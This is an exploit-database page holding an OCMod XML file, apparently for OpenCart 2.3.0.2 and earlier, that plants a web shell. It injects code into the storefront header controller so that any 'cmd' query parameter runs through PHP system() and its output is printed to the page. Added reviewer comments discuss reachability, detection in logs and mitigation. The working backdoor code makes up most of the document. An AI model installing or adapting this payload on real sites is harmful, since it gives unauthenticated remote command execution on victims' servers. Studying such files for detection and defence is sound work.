## https://sploitus.com/exploit?id=PACKETSTORM:153880
<?xml version="1.0" encoding="utf-8"?>  
  
<!-- Opencart <= 2.3.0.2 Insecure OCMod Generation Pre-Auth RCE -->  
  
<!-- Copyright 2019 (c) Todor Donev <todor.donev at gmail.com> -->  
  
<!-- Disclaimer: -->  
  
<!-- This or previous programs is for Educational -->  
<!-- purpose ONLY. Do not use it without permission. -->  
<!-- The usual disclaimer applies, especially the -->  
<!-- fact that Todor Donev is not liable for any -->  
<!-- damages caused by direct or indirect use of the -->  
<!-- information or functionality provided by these -->  
<!-- programs. The author or any Internet provider -->  
<!-- bears NO responsibility for content or misuse -->  
<!-- of these programs or any derivatives thereof. -->  
<!-- By using these programs you accept the fact -->  
<!-- that any damage (dataloss, system crash, -->  
<!-- system compromise, etc.) caused by the use -->  
<!-- of these programs is not Todor Donev's -->  
<!-- responsibility. -->  
  
<!-- Use them at your own risk! -->  
  
<!-- NOTES: This file must be - oc2302_preauth_rce.ocmod.xml -->  
  
<!-- Reviewer note: this OCMod file patches a storefront controller so that a request
     carrying a "cmd" query parameter has that value handed to PHP system() and the
     command output echoed into the page. The injected branch performs no authentication,
     authorisation or input check. The title describes the issue as pre-auth; how the
     file reaches the OCMod installer is not shown on this page. -->
<modification>  
<!-- Metadata shown in the admin modification list. name and code carry the advisory title,
     which makes this particular file easy to spot; a renamed copy would not be. -->
<name><![CDATA[Opencart <= 2.3.0.2 Insecure OCMod Generation Pre-Auth RCE]]></name>  
<code><![CDATA[Opencart <= 2.3.0.2 Insecure OCMod Generation Pre-Auth RCE]]></code>  
<version>1.0</version>  
<author>Todor Donev</author>  
<link>mailto:todor.donev@gmail.com</link>  
  
<!-- Target file: the catalog (storefront) common header controller.
     NOTE(review): presumably this controller runs on most storefront pages, so the
     injected branch would be reachable from almost any public URL; confirm against the
     deployed theme. OCMod normally applies patches to a generated copy in its modification
     cache rather than to the original file, so integrity checks that only hash the
     original source tree may not see the change; verify for the installed version. -->
<file path="catalog/controller/common/header.php">  
<operation>  
<!-- Anchor: the patch is inserted relative to this existing source comment. -->
<search><![CDATA[// For page specific css]]></search>  
<!-- Payload: inserted before the anchor. Reads the "cmd" GET parameter unmodified and
     passes it to system(), wrapping the output in pre tags.
     Detection: look for system() fed from request->get in patched controller copies,
     review the installed modification list for unknown entries, and search web access
     logs for storefront requests with a cmd= query parameter.
     Mitigation: remove the modification and refresh the modification cache, restrict
     who may upload or install extensions, review every .ocmod.xml before installing,
     and consider blocking command-execution functions with PHP disable_functions. -->
<add position="before"><![CDATA[ if(isset($this->request->get['cmd'])){  
echo "<pre>";  
$cmd = ($this->request->get['cmd']);  
system($cmd);  
echo "</pre>";  
}]]></add>  
</operation>  
</file>  
</modification>